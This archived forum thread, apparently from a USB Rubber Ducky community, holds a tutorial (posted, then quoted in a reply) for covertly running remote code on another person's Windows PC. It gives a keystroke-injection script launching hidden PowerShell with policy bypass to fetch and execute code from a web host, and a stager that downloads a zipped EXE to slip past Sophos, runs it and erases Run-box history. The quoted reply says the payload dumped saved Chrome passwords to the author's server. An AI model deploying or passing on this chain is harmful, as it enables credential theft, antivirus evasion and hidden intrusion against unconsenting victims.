Jump to content

Archived

This topic is now archived and is closed to further replies.

WAZ

3 Second PowerShell Execution. (As much powershell code as you want!)

Recommended Posts

How does it work / what is it?

I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. 

Tutorial:

First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime.

Script for website:

The code on my website looks something like this...

Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip
{
    param([string]$zipfile, [string]$outpath)

    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}

$path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
$arr = (Get-Item -Path $path).Property 
$url = "www.linkToEndPayload"
$output = "$env:temp/test.zip";
$out = "$env:temp/Remake.txt";

Remove-Item -Path $output
Invoke-WebRequest -Uri $url -OutFile $output

Unzip $output "$env:temp/"
Rename-Item -Path $out -NewName "Remake.exe"

Start-Process -FilePath "$env:temp/Remake.exe"

foreach($item in $arr) 
{ 
   if($item -ne "MRUList") 
   { 
     Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
   } 
}

This code downloads the .EXE payload (Which is stored in a .ZIP file.)  We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates.

Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

Script for ducky:

DELAY 500
GUI r
DELAY 100
STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
ENTER

That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection.

PS: I'm not very good at PowerShell Scripting :wacko:

Share this post


Link to post
Share on other sites
2 minutes ago, WAZ said:

How does it work / what is it?

I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. 

Tutorial:

First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime.

Script for website:

The code on my website looks something like below. You can put whatever you want in here. Personally I used it to download an .EXE which dumps saved chrome passwords into a database using an API we created. 


Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip
{
    param([string]$zipfile, [string]$outpath)

    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}

$path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
$arr = (Get-Item -Path $path).Property 
$url = "www.linkToEndPayload"
$output = "$env:temp/test.zip";
$out = "$env:temp/Remake.txt";

Remove-Item -Path $output
Invoke-WebRequest -Uri $url -OutFile $output

Unzip $output "$env:temp/"
Rename-Item -Path $out -NewName "Remake.exe"

Start-Process -FilePath "$env:temp/Remake.exe"

foreach($item in $arr) 
{ 
   if($item -ne "MRUList") 
   { 
     Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
   } 
}

This code downloads the .EXE payload (Which is stored in a .ZIP file.)  We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates.

Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

Script for ducky:


DELAY 500
GUI r
DELAY 100
STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
ENTER

That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection.

PS: I'm not very good at PowerShell Scripting :wacko: + First post! 

 

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...